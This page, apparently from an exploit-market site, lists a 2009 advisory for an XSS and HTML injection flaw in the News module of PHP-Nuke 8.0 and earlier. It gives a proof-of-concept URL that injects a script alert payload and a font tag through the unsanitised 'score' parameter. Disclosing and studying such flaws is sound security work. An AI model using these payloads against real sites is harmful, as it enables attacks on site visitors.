[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-Nuke <= 8.0 XSS & HTML Code Injection in News Module

Author
K053
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10034
Category
web applications
Date add
27-11-2009
Platform
unsorted
========================================================
PHP-Nuke <= 8.0 XSS & HTML Code Injection in News Module
========================================================

# Software Link: http://www.phpnuke.org/modules.php?name=Downloads&d_op=viewdownload&cid=1
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
note :
 
This bug found by tampering passed data .
coders don't sanitize and check user entry point for news rate.
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
POC:
 
http://server/modules.php?name=News&op=rate_complete&sid=6&score=[insert ur code here]
 
1. xss : <SCRIPT>alert(/XSS/.source)</SCRIPT>
2. Html code injection : <font color=red>
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


#  0day.today [2024-11-15]  #